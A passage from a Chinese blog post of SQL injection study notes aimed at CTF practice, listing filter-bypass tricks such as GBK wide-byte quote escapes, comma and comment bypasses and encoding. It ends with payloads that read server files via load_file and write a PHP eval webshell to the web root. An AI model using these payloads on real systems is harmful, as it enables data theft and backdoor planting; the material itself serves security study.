<h6 id="3-2-3-通过空白字符绕过，各个数据库都有一些空白字符"><a href="#3-2-3-通过空白字符绕过，各个数据库都有一些空白字符" class="headerlink" title="3.2.3 通过空白字符绕过，各个数据库都有一些空白字符"></a>3.2.3 通过空白字符绕过，各个数据库都有一些空白字符</h6><pre class="line-numbers language-none"><code class="language-none">MySQL5--09,0A,0B,0C,0D,A0,20<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<h6 id="3-2-4-通过特殊字符（如括号，反引号等）"><a href="#3-2-4-通过特殊字符（如括号，反引号等）" class="headerlink" title="3.2.4 通过特殊字符（如括号，反引号等）"></a>3.2.4 通过特殊字符（如括号，反引号等）</h6><pre><code>select(user())</code></pre>
<h6 id="3-2-5-科学计数法绕过"><a href="#3-2-5-科学计数法绕过" class="headerlink" title="3.2.5 科学计数法绕过"></a>3.2.5 科学计数法绕过</h6><pre class="line-numbers language-none"><code class="language-none">select user,password from users where user_id=0e1union select 1,2<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<h5 id="3-3-过滤单引号"><a href="#3-3-过滤单引号" class="headerlink" title="3.3 过滤单引号"></a>3.3 过滤单引号</h5><p>过滤 ‘ 的时候往往利用的思路是将 ‘ 转换为\ ' 。</p>
<pre><code>id=-1%df%27union select 1,user(),3--+</code></pre>
<p>在 mysql 中使用 GBK 编码的时候，会认为两个字符为一个汉字，一般有两种思路：</p>
<ol>
<li>%df 吃掉 \ 具体的方法是 urlencode(‘) = %5c%27，我们在 %5c%27 前面添加 %df ，形成 %df%5c%27 ，而 mysql 在 GBK 编码方式的时候会将两个字节当做一个汉字，%df%5c 就是一个汉字，%27 作为一个单独的（’）符号在外面：</li>
<li>将 ' 中的 \ 过滤掉，例如可以构造 %**%5c%5c%27 ，后面的 %5c 会被前面的 %5c 注释掉。</li>
</ol>
<pre class="line-numbers language-none"><code class="language-none">%df%27=====(addslashes)======&gt;%df%5c%27======(GBK)======&gt;運’

id=-1%df%27union select 1,user(),3--+<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<h5 id="3-4-过滤等号"><a href="#3-4-过滤等号" class="headerlink" title="3.4 过滤等号"></a>3.4 过滤等号</h5><p>使用like 、rlike 、regexp 或者 使用比较符（）</p>
<h5 id="3-5-过滤逗号"><a href="#3-5-过滤逗号" class="headerlink" title="3.5 过滤逗号"></a>3.5 过滤逗号</h5><p>可以使用join方法绕过</p>
<pre class="line-numbers language-none"><code class="language-none">	union select 1,2,3 

join语句： 

	union select * from (select 1)a join (select 2)b join (select 3) <span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<h5 id="3-6-过滤比较符（）"><a href="#3-6-过滤比较符（）" class="headerlink" title="3.6 过滤比较符（）"></a>3.6 过滤比较符（）</h5><p>使用greatest()、least（）：（前者返回最大值，后者返回最小值）</p>
<h5 id="3-7-过滤注释符（-–）"><a href="#3-7-过滤注释符（-–）" class="headerlink" title="3.7 过滤注释符（#,–）"></a>3.7 过滤注释符（#,–）</h5><pre class="line-numbers language-none"><code class="language-none">id=1' union select 1,2,3||'1<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>最后的or ‘1闭合查询语句的最后的单引号，或者：</p>
<pre class="line-numbers language-none"><code class="language-none">id=1' union select 1,2,'3<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>3.8 进行编码绕过</p>
<p>如URLEncode编码，ASCII,HEX,unicode编码绕过：</p>
<pre class="line-numbers language-none"><code class="language-none">or 1=1

%6f%72%20%31%3d%31

CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)。<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<h4 id="4-SQL读写文件"><a href="#4-SQL读写文件" class="headerlink" title="4 SQL读写文件"></a>4 SQL读写文件</h4><p>在了解SQL注入的原理、方法、过滤之后</p>
<p>继续学习一下SQL读写文件</p>
<p>CTF中有的flag在文件中，但是存在SQL注入，渗透过程中，你也可以写入木马文件</p>
<p>在具有file权限的情况下，使用load_file和into  outfile/dumpfile进行读写</p>
<p>读取文件</p>
<pre class="line-numbers language-none"><code class="language-none">?id=-1+union+select+load_file('/etc/hosts')<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>在某些绕过单引号的情况下，可以使用文件名的十六进制来作为load_file函数的参数</p>
<pre class="line-numbers language-none"><code class="language-none">?id=-1+union+select+load_file(0x2f6574632f686f737473)<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>也可以通过sql写文件</p>
<pre class="line-numbers language-none"><code class="language-none">?id=-1+union+select+’&lt;?php eval($_POST[-7]);&gt;‘+into+outfile'/var/www/html/shell.php'<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>或</p>
<pre class="line-numbers language-none"><code class="language-none">?id=-1+union+select+unhex(一句话shell的十六进制)+into+dumpfile'/var/www/html/shell.php'<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>值得注意的是，除了要有写文件的权限，文件名不能是已存在的.</p>
<h4 id="5-总结"><a href="#5-总结" class="headerlink" title="5 总结"></a>5 总结</h4><p>就此关于SQL注入的总结已经完成了，最近在看CTF特训营，顿时发觉自己学的还很浅，于是觉得该好好的总结一次。除了CTF特训营上的内容，还有以前浏览网上各大博主发表的wp、总结等所记录的笔记，学会了很多。如果本文存在错误或有其他问题以及还存在补充，敬请指正。</p>

                
            </div>
            <hr/>

            

    <div class="reprint" id="reprint-statement">
        
            <div class="reprint__author">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-user">
                        文章作者:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="/about" rel="external nofollow noreferrer">诚默</a>
                </span>
            </div>
            <div class="reprint__type">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-link">
                        文章链接:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="https://www.ex1t.xyz/2020/07/30/%E6%BC%8F%E6%B4%9E%E5%A4%A7%E6%80%BB%E7%BB%931-sql%E6%B3%A8%E5%85%A5/">https://www.ex1t.xyz/2020/07/30/%E6%BC%8F%E6%B4%9E%E5%A4%A7%E6%80%BB%E7%BB%931-sql%E6%B3%A8%E5%85%A5/</a>
                </span>
            </div>
            <div class="reprint__notice">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-copyright">
                        版权声明:
                    </i>
                </span>
                <span class="reprint-info">
                    本博客所有文章除特別声明外，均采用
                    <a href="https://creativecommons.org/licenses/by/4.0/deed.zh" rel="external nofollow noreferrer" target="_blank">CC BY 4.0</a>
                    许可协议。转载请注明来源
                    <a href="/about" target="_blank">诚默</a>
                    !
                </span>
            </div>
        
    </div>

    <script async defer>
      document.addEventListener("copy", function (e) {
        let toastHTML = '<span>复制成功，请遵循本文的转载规则</span><button class="btn-flat toast-action" onclick="navToReprintStatement()" style="font-size: smaller">查看</a>';
        M.toast({html: toastHTML})
      });

      function navToReprintStatement() {
        $("html, body").animate({scrollTop: $("#reprint-statement").offset().top - 80}, 800);
      }
    </script>



            <div class="tag_share" style="display: block;">
                <div class="post-meta__tag-list" style="display: inline-block;">
                    
                        <div class="article-tag">
                            
                                <a href="/tags/%E6%BC%8F%E6%B4%9E/">
                                    <span class="chip bg-color">漏洞</span>
                                </a>
                            
                        </div>
                    
                </div>
                <div class="post_share" style="zoom: 80%; width: fit-content; display: inline-block; float: right; margin: -0.15rem 0;">
                    <link rel="stylesheet" type="text/css" href="/libs/share/css/share.min.css">
<div id="article-share">

    
    <div class="social-share" data-sites="twitter,facebook,google,qq,qzone,wechat,weibo,douban,linkedin" data-wechat-qrcode-helper="<p>微信扫一扫即可分享！</p>"></div>
    <script src="/libs/share/js/social-share.min.js"></script>
    

    

</div>

                </div>
            </div>
            
                <style>
    #reward {
        margin: 40px 0;
        text-align: center;
    }

    #reward .reward-link {
        font-size: 1.4rem;
        line-height: 38px;
    }

    #reward .btn-floating:hover {
        box-shadow: 0 6px 12px rgba(0, 0, 0, 0.2), 0 5px 15px rgba(0, 0, 0, 0.2);
    }

    #rewardModal {
        width: 320px;
        height: 350px;
    }

    #rewardModal .reward-title {
        margin: 15px auto;
        padding-bottom: 5px;
    }

    #rewardModal .modal-content {
        padding: 10px;
    }

    #rewardModal .close {
        position: absolute;
        right: 15px;
        top: 15px;
        color: rgba(0, 0, 0, 0.5);
        font-size: 1.3rem;
        line-height: 20px;
        cursor: pointer;
    }

    #rewardModal .close:hover {
        color: #ef5350;
        transform: scale(1.3);
        -moz-transform:scale(1.3);
        -webkit-transform:scale(1.3);
        -o-transform:scale(1.3);
    }

    #rewardModal .reward-tabs {
        margin: 0 auto;
        width: 210px;
    }

    .reward-tabs .tabs {
        height: 38px;
        margin: 10px auto;
        padding-left: 0;
    }

    .reward-content ul {
        padding-left: 0 !important;
    }

    .reward-tabs .tabs .tab {
        height: 38px;
        line-height: 38px;
    }

    .reward-tabs .tab a {
        color: #fff;
        background-color: #ccc;
    }

    .reward-tabs .tab a:hover {
        background-color: #ccc;
        color: #fff;
    }

    .reward-tabs .wechat-tab .active {
        color: #fff !important;
        background-color: #22AB38 !important;
    }

    .reward-tabs .alipay-tab .active {
        color: #fff !important;
        background-color: #019FE8 !important;
    }

    .reward-tabs .reward-img {
        width: 210px;
        height: 210px;
    }
</style>

<div id="reward">
    <a href="#rewardModal" class="reward-link modal-trigger btn-floating btn-medium waves-effect waves-light red">赏</a>

    <!-- Modal Structure -->
    <div id="rewardModal" class="modal">
        <div class="modal-content">
            <a class="close modal-close"><i class="fas fa-times"></i></a>
            <h4 class="reward-title">你的赏识是我前进的动力</h4>
            <div class="reward-content">
                <div class="reward-tabs">
                    <ul class="tabs row">
                        <li class="tab col s6 alipay-tab waves-effect waves-light"><a href="#alipay">支付宝</a></li>
                        <li class="tab col s6 wechat-tab waves-effect waves-light"><a href="#wechat">微 信</a></li>
                    </ul>
                    <div id="alipay">
                        <img src="/medias/reward/alipay.jpg" class="reward-img" alt="支付宝打赏二维码">
                    </div>
                    <div id="wechat">
                        <img src="/medias/reward/wechat.png" class="reward-img" alt="微信打赏二维码">
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>

<script>
    $(function () {
        $('.tabs').tabs();
    });
</script>

            
        </div>
    </div>

    

    

    

    

    
        <style>
    .valine-card {
        margin: 1.5rem auto;
    }

    .valine-card .card-content {
        padding: 20px 20px 5px 20px;
    }

    #vcomments textarea {
        box-sizing: border-box;
        background: url("/medias/comment_bg.png") 100% 100% no-repeat;
    }

    #vcomments p {
        margin: 2px 2px 10px;
        font-size: 1.05rem;
        line-height: 1.78rem;
    }

    #vcomments blockquote p {
        text-indent: 0.2rem;
    }

    #vcomments a {
        padding: 0 2px;
        color: #4cbf30;
        font-weight: 500;
        text-decoration: none;
    }

    #vcomments img {
        max-width: 100%;
        height: auto;
        cursor: pointer;
    }

    #vcomments ol li {
        list-style-type: decimal;
    }

    #vcomments ol,
    ul {
        display: block;
        padding-left: 2em;
        word-spacing: 0.05rem;
    }

    #vcomments ul li,
    ol li {
        display: list-item;
        line-height: 1.8rem;
        font-size: 1rem;
    }

    #vcomments ul li {
        list-style-type: disc;
    }

    #vcomments ul ul li {
        list-style-type: circle;
    }

    #vcomments table, th, td {
        padding: 12px 13px;
        border: 1px solid #dfe2e5;
    }

    #vcomments table, th, td {
        border: 0;
    }

    table tr:nth-child(2n), thead {
        background-color: #fafafa;
    }

    #vcomments table th {
        background-color: #f2f2f2;
        min-width: 80px;
    }

    #vcomments table td {
        min-width: 80px;
    }

    #vcomments h1 {
        font-size: 1.85rem;
        font-weight: bold;
        line-height: 2.2rem;
    }

    #vcomments h2 {
        font-size: 1.65rem;
        font-weight: bold;
        line-height: 1.9rem;
    }

    #vcomments h3 {
        font-size: 1.45rem;
        font-weight: bold;
        line-height: 1.7rem;
    }

    #vcomments h4 {
        font-size: 1.25rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    #vcomments h5 {
        font-size: 1.1rem;
        font-weight: bold;
        line-height: 1.4rem;
    }

    #vcomments h6 {
        font-size: 1rem;
        line-height: 1.3rem;
    }

    #vcomments p {
        font-size: 1rem;
        line-height: 1.5rem;
    }

    #vcomments hr {
        margin: 12px 0;
        border: 0;
        border-top: 1px solid #ccc;
    }

    #vcomments blockquote {
        margin: 15px 0;
        border-left: 5px solid #42b983;
        padding: 1rem 0.8rem 0.3rem 0.8rem;
        color: #666;
        background-color: rgba(66, 185, 131, .1);
    }

    #vcomments pre {
        font-family: monospace, monospace;
        padding: 1.2em;
        margin: .5em 0;
        background: #272822;
        overflow: auto;
        border-radius: 0.3em;
        tab-size: 4;
    }

    #vcomments code {
        font-family: monospace, monospace;
        padding: 1px 3px;
        font-size: 0.92rem;
        color: #e96900;
        background-color: #f8f8f8;
        border-radius: 2px;
    }

    #vcomments pre code {
        font-family: monospace, monospace;
        padding: 0;
        color: #e8eaf6;
        background-color: #272822;
    }

    #vcomments pre[class*="language-"] {
        padding: 1.2em;
        margin: .5em 0;
    }

    #vcomments code[class*="language-"],
    pre[class*="language-"] {
        color: #e8eaf6;
    }

    #vcomments [type="checkbox"]:not(:checked), [type="checkbox"]:checked {
        position: inherit;
        margin-left: -1.3rem;
        margin-right: 0.4rem;
        margin-top: -1px;
        vertical-align: middle;
        left: unset;
        visibility: visible;
    }

    #vcomments b,
    strong {
        font-weight: bold;
    }

    #vcomments dfn {
        font-style: italic;
    }

    #vcomments small {
        font-size: 85%;
    }

    #vcomments cite {
        font-style: normal;
    }

    #vcomments mark {
        background-color: #fcf8e3;
        padding: .2em;
    }

    #vcomments table, th, td {
        padding: 12px 13px;
        border: 1px solid #dfe2e5;
    }

    table tr:nth-child(2n), thead {
        background-color: #fafafa;
    }

    #vcomments table th {
        background-color: #f2f2f2;
        min-width: 80px;
    }

    #vcomments table td {
        min-width: 80px;
    }

    #vcomments [type="checkbox"]:not(:checked), [type="checkbox"]:checked {
        position: inherit;
        margin-left: -1.3rem;
        margin-right: 0.4rem;
        margin-top: -1px;
        vertical-align: middle;
        left: unset;
        visibility: visible;
    }
</style>

<div class="card valine-card" data-aos="fade-up">
    <div class="comment_headling" style="font-size: 20px; font-weight: 700; position: relative; padding-left: 20px; top: 15px; padding-bottom: 5px;">
        <i class="fas fa-comments fa-fw" aria-hidden="true"></i>
        <span>评论</span>
    </div>
    <div id="vcomments" class="card-content" style="display: grid">
    </div>
</div>

<script src="/libs/valine/av-min.js"></script>
<script src="/libs/valine/Valine.min.js"></script>
<script>
    new Valine({
        el: '#vcomments',
        appId: 'QS25DiKJV53FDn9TcDUAOa8z-gzGzoHsz',
        appKey: 'reyqGLYYvws75kGst7ypLWpq',
        notify: 'false' === 'true',
        verify: 'false' === 'true',
        visitor: 'true' === 'true',
        avatar: 'mm',
        pageSize: '10',
        lang: 'zh-cn',
        placeholder: '兄弟，快来评论吧'
    });
</script>

    

    

    

    

<article id="prenext-posts" class="prev-next articles">
    <div class="row article-row">
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge left-badge text-color">
                <i class="fas fa-chevron-left"></i>&nbsp;上一篇</div>
            <div class="card">
                <a href="/2020/08/27/mysql%E6%95%B0%E6%8D%AE%E5%BA%93%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0%E4%B9%8B%E6%95%B0%E6%8D%AE%E5%BA%93%E5%8F%8Asql%E5%9F%BA%E7%A1%80/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/7.jpg" class="responsive-img" alt="mysql数据库学习笔记之数据库及MySQL基础">
                        
                        <span class="card-title">mysql数据库学习笔记之数据库及MySQL基础</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                        <span class="publish-date">
                            <i class="far fa-clock fa-fw icon-date"></i>2020-08-27
                        </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-user fa-fw"></i>
                            shmily
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/mysql/">
                        <span class="chip bg-color">mysql</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge right-badge text-color">
                下一篇&nbsp;<i class="fas fa-chevron-right"></i>
            </div>
            <div class="card">
                <a href="/2020/07/08/%E4%B8%80%E9%A2%98python%E5%8A%A0%E5%AF%86%E9%A2%98/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/10.jpg" class="responsive-img" alt="一题python加密题">
                        
                        <span class="card-title">一题python加密题</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2020-07-08
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-user fa-fw"></i>
                            k3vi
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/python/">
                        <span class="chip bg-color">python</span>
                    </a>
                    
                    <a href="/tags/ctf/">
                        <span class="chip bg-color">Ctf</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
    </div>
</article>

</div>


<script>
    $('#articleContent').on('copy', function (e) {
        // IE8 or earlier browser is 'undefined'
        if (typeof window.getSelection === 'undefined') return;

        var selection = window.getSelection();
        // if the selection is short let's not annoy our users.
        if (('' + selection).length < Number.parseInt('50')) {
            return;
        }

        // create a div outside of the visible area and fill it with the selected text.
        var bodyElement = document.getElementsByTagName('body')[0];
        var newdiv = document.createElement('div');
        newdiv.style.position = 'absolute';
        newdiv.style.left = '-99999px';
        bodyElement.appendChild(newdiv);
        newdiv.appendChild(selection.getRangeAt(0).cloneContents());

        // we need a <pre> tag workaround.
        // otherwise the text inside "pre" loses all the line breaks!
        if (selection.getRangeAt(0).commonAncestorContainer.nodeName === 'PRE') {
            newdiv.innerHTML = "<pre>" + newdiv.innerHTML + "</pre>";
        }

        var url = document.location.href;
        newdiv.innerHTML += '<br />'
            + '来源: Ex1t<br />'
            + '文章作者: Ex1t<br />'
            + '文章链接: <a href="' + url + '">' + url + '</a><br />'
            + '本文章著作权归作者所有，任何形式的转载都请注明出处。';

        selection.selectAllChildren(newdiv);
        window.setTimeout(function () {bodyElement.removeChild(newdiv);}, 200);
    });
</script>


<!-- 代码块功能依赖 -->
<script type="text/javascript" src="/libs/codeBlock/codeBlockFuction.js"></script>

<!-- 代码语言 -->

<script type="text/javascript" src="/libs/codeBlock/codeLang.js"></script>


<!-- 代码块复制 -->

<script type="text/javascript" src="/libs/codeBlock/codeCopy.js"></script>


<!-- 代码块收缩 -->

<script type="text/javascript" src="/libs/codeBlock/codeShrink.js"></script>


    </div>
    <div id="toc-aside" class="expanded col l3 hide-on-med-and-down">
        <div class="toc-widget card" style="background-color: white;">
            <div class="toc-title"><i class="far fa-list-alt"></i>&nbsp;&nbsp;目录</div>
            <div id="toc-content"></div>
        </div>
    </div>
</div>

<!-- TOC 悬浮按钮. -->

<div id="floating-toc-btn" class="hide-on-med-and-down">
    <a class="btn-floating btn-large bg-color">
        <i class="fas fa-list-ul"></i>
    </a>
</div>


<script src="/libs/tocbot/tocbot.min.js"></script>
<script>
    $(function () {
        tocbot.init({
            tocSelector: '#toc-content',
            contentSelector: '#articleContent',
            headingsOffset: -($(window).height() * 0.4 - 45),
            collapseDepth: Number('0'),
            headingSelector: 'h2, h3, h4'
        });

        // modify the toc link href to support Chinese.
        let i = 0;
        let tocHeading = 'toc-heading-';
        $('#toc-content a').each(function () {
            $(this).attr('href', '#' + tocHeading + (++i));
        });

        // modify the heading title id to support Chinese.
        i = 0;
        $('#articleContent').children('h2, h3, h4').each(function () {
            $(this).attr('id', tocHeading + (++i));
        });

        // Set scroll toc fixed.
        let tocHeight = parseInt($(window).height() * 0.4 - 64);
        let $tocWidget = $('.toc-widget');
        $(window).scroll(function () {
            let scroll = $(window).scrollTop();
            /* add post toc fixed. */
            if (scroll > tocHeight) {
                $tocWidget.addClass('toc-fixed');
            } else {
                $tocWidget.removeClass('toc-fixed');
            }
        });

        
        /* 修复文章卡片 div 的宽度. */
        let fixPostCardWidth = function (srcId, targetId) {
            let srcDiv = $('#' + srcId);
            if (srcDiv.length === 0) {
                return;
            }

            let w = srcDiv.width();
            if (w >= 450) {
                w = w + 21;
            } else if (w >= 350 && w < 450) {
                w = w + 18;
            } else if (w >= 300 && w < 350) {
                w = w + 16;
            } else {
                w = w + 14;
            }
            $('#' + targetId).width(w);
        };

        // 切换TOC目录展开收缩的相关操作.
        const expandedClass = 'expanded';
        let $tocAside = $('#toc-aside');
        let $mainContent = $('#main-content');
        $('#floating-toc-btn .btn-floating').click(function () {
            if ($tocAside.hasClass(expandedClass)) {
                $tocAside.removeClass(expandedClass).hide();
                $mainContent.removeClass('l9');
            } else {
                $tocAside.addClass(expandedClass).show();
                $mainContent.addClass('l9');
            }
            fixPostCardWidth('artDetail', 'prenext-posts');
        });
        
    });
</script>

    

</main>




    <footer class="page-footer bg-color">
    
    <div class="container row center-align" style="margin-bottom: 15px !important;">
        <div class="col s12 m8 l8 copy-right">
            Copyright&nbsp;&copy;
            
                <span id="year">2019-2021</span>
            
            <span id="year">2019</span>
            <a href="/about" target="_blank">Ex1t</a>
            |&nbsp;Powered by&nbsp;<a href="https://hexo.io/" target="_blank">Hexo</a>
            |&nbsp;Theme&nbsp;<a href="https://github.com/blinkfox/hexo-theme-matery" target="_blank">Matery</a>
            <br>
            
            &nbsp;<i class="fas fa-chart-area"></i>&nbsp;站点总字数:&nbsp;<span
                class="white-color">24.8k</span>&nbsp;字
            
            
            
            
            
            
            <span id="busuanzi_container_site_pv">
                |&nbsp;<i class="far fa-eye"></i>&nbsp;总访问量:&nbsp;<span id="busuanzi_value_site_pv"
                    class="white-color"></span>&nbsp;次
            </span>
            
            
            <span id="busuanzi_container_site_uv">
                |&nbsp;<i class="fas fa-users"></i>&nbsp;总访问人数:&nbsp;<span id="busuanzi_value_site_uv"
                    class="white-color"></span>&nbsp;人
            </span>
            
            <br>
            
            <span id="sitetime">载入运行时间...</span>
            <script>
                function siteTime() {
                    var seconds = 1000;
                    var minutes = seconds * 60;
                    var hours = minutes * 60;
                    var days = hours * 24;
                    var years = days * 365;
                    var today = new Date();
                    var startYear = "2019";
                    var startMonth = "11";
                    var startDate = "3";
                    var startHour = "0";
                    var startMinute = "0";
                    var startSecond = "0";
                    var todayYear = today.getFullYear();
                    var todayMonth = today.getMonth() + 1;
                    var todayDate = today.getDate();
                    var todayHour = today.getHours();
                    var todayMinute = today.getMinutes();
                    var todaySecond = today.getSeconds();
                    var t1 = Date.UTC(startYear, startMonth, startDate, startHour, startMinute, startSecond);
                    var t2 = Date.UTC(todayYear, todayMonth, todayDate, todayHour, todayMinute, todaySecond);
                    var diff = t2 - t1;
                    var diffYears = Math.floor(diff / years);
                    var diffDays = Math.floor((diff / days) - diffYears * 365);
                    var diffHours = Math.floor((diff - (diffYears * 365 + diffDays) * days) / hours);
                    var diffMinutes = Math.floor((diff - (diffYears * 365 + diffDays) * days - diffHours * hours) /
                        minutes);
                    var diffSeconds = Math.floor((diff - (diffYears * 365 + diffDays) * days - diffHours * hours -
                        diffMinutes * minutes) / seconds);
                    if (startYear == todayYear) {
                        document.getElementById("year").innerHTML = todayYear;
                        document.getElementById("sitetime").innerHTML = "本站已安全运行 " + diffDays + " 天 " + diffHours +
                            " 小时 " + diffMinutes + " 分钟 " + diffSeconds + " 秒";
                    } else {
                        document.getElementById("year").innerHTML = startYear + " - " + todayYear;
                        document.getElementById("sitetime").innerHTML = "本站已安全运行 " + diffYears + " 年 " + diffDays +
                            " 天 " + diffHours + " 小时 " + diffMinutes + " 分钟 " + diffSeconds + " 秒";
                    }
                }
                setInterval(siteTime, 1000);
            </script>
            
            <br>
            
            <span id="icp"><img src="/medias/icp.png" style="vertical-align: text-bottom;" />
                <a href="http://www.beian.miit.gov.cn/" target="_blank">皖ICP备 19019341号-1</a>
            </span>
            
        </div>
        <div class="col s12 m4 l4 social-link social-statis">


    <a href="mailto:k3vi@ex1t.xyz" class="tooltipped" target="_blank" data-tooltip="邮件联系我" data-position="top" data-delay="50">
        <i class="fas fa-envelope-open"></i>
    </a>













    <a href="/atom.xml" class="tooltipped" target="_blank" data-tooltip="RSS 订阅" data-position="top" data-delay="50">
        <i class="fas fa-rss"></i>
    </a>

</div>
    </div>
</footer>

<div class="progress-bar"></div>


    <!-- 搜索遮罩框 -->
<div id="searchModal" class="modal">
    <div class="modal-content">
        <div class="search-header">
            <span class="title"><i class="fas fa-search"></i>&nbsp;&nbsp;搜索</span>
            <input type="search" id="searchInput" name="s" placeholder="请输入搜索的关键字"
                   class="search-input">
        </div>
        <div id="searchResult"></div>
    </div>
</div>

<script type="text/javascript">
$(function () {
    var searchFunc = function (path, search_id, content_id) {
        'use strict';
        $.ajax({
            url: path,
            dataType: "xml",
            success: function (xmlResponse) {
                // get the contents from search data
                var datas = $("entry", xmlResponse).map(function () {
                    return {
                        title: $("title", this).text(),
                        content: $("content", this).text(),
                        url: $("url", this).text()
                    };
                }).get();
                var $input = document.getElementById(search_id);
                var $resultContent = document.getElementById(content_id);
                $input.addEventListener('input', function () {
                    var str = '<ul class=\"search-result-list\">';
                    var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
                    $resultContent.innerHTML = "";
                    if (this.value.trim().length <= 0) {
                        return;
                    }
                    // perform local searching
                    datas.forEach(function (data) {
                        var isMatch = true;
                        var data_title = data.title.trim().toLowerCase();
                        var data_content = data.content.trim().replace(/<[^>]+>/g, "").toLowerCase();
                        var data_url = data.url;
                        data_url = data_url.indexOf('/') === 0 ? data.url : '/' + data_url;
                        var index_title = -1;
                        var index_content = -1;
                        var first_occur = -1;
                        // only match artiles with not empty titles and contents
                        if (data_title !== '' && data_content !== '') {
                            keywords.forEach(function (keyword, i) {
                                index_title = data_title.indexOf(keyword);
                                index_content = data_content.indexOf(keyword);
                                if (index_title < 0 && index_content < 0) {
                                    isMatch = false;
                                } else {
                                    if (index_content < 0) {
                                        index_content = 0;
                                    }
                                    if (i === 0) {
                                        first_occur = index_content;
                                    }
                                }
                            });
                        }
                        // show search results
                        if (isMatch) {
                            str += "<li><a href='" + data_url + "' class='search-result-title'>" + data_title + "</a>";
                            var content = data.content.trim().replace(/<[^>]+>/g, "");
                            if (first_occur >= 0) {
                                // cut out 100 characters
                                var start = first_occur - 20;
                                var end = first_occur + 80;
                                if (start < 0) {
                                    start = 0;
                                }
                                if (start === 0) {
                                    end = 100;
                                }
                                if (end > content.length) {
                                    end = content.length;
                                }
                                var match_content = content.substr(start, end);
                                // highlight all keywords
                                keywords.forEach(function (keyword) {
                                    var regS = new RegExp(keyword, "gi");
                                    match_content = match_content.replace(regS, "<em class=\"search-keyword\">" + keyword + "</em>");
                                });

                                str += "<p class=\"search-result\">" + match_content + "...</p>"
                            }
                            str += "</li>";
                        }
                    });
                    str += "</ul>";
                    $resultContent.innerHTML = str;
                });
            }
        });
    };

    searchFunc('/search.xml', 'searchInput', 'searchResult');
});
</script>

    <!-- 回到顶部按钮 -->
<div id="backTop" class="top-scroll">
    <a class="btn-floating btn-large waves-effect waves-light" href="#!">
        <i class="fas fa-arrow-up"></i>
    </a>
</div>


    <script src="/libs/materialize/materialize.min.js"></script>
    <script src="/libs/masonry/masonry.pkgd.min.js"></script>
    <script src="/libs/aos/aos.js"></script>
    <script src="/libs/scrollprogress/scrollProgress.min.js"></script>
    <script src="/libs/lightGallery/js/lightgallery-all.min.js"></script>
    <script src="/js/matery.js"></script>

    <!-- Baidu Analytics -->

    <!-- Baidu Push -->

<script>
    (function () {
        var bp = document.createElement('script');
        var curProtocol = window.location.protocol.split(':')[0];
        if (curProtocol === 'https') {
            bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
        } else {
            bp.src = 'http://push.zhanzhang.baidu.com/push.js';
        }
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(bp, s);
    })();
</script>

    
    <script src="/libs/others/clicklove.js" async="async"></script>
    
    
    <script async src="/libs/others/busuanzi.pure.mini.js"></script>
    

    

    

    <!--腾讯兔小巢-->
    
        <div style="position:fixed;bottom:125px;right:16px;cursor: pointer;">
            <a title="兔小巢" target="_blank" rel="noopener" href="https://support.qq.com/products/301992"><i class="fa fa-comments fa-3x"  aria-hidden="true"></i></a>
        </div>
    
    
    <script type="text/javascript" color="0,0,255"
        pointColor="0,0,255" opacity='0.7'
        zIndex="-1" count="99"
        src="/libs/background/canvas-nest.js"></script>
    

    

    

    
    <script src="/libs/instantpage/instantpage.js" type="module"></script>
    

</body>

</html>
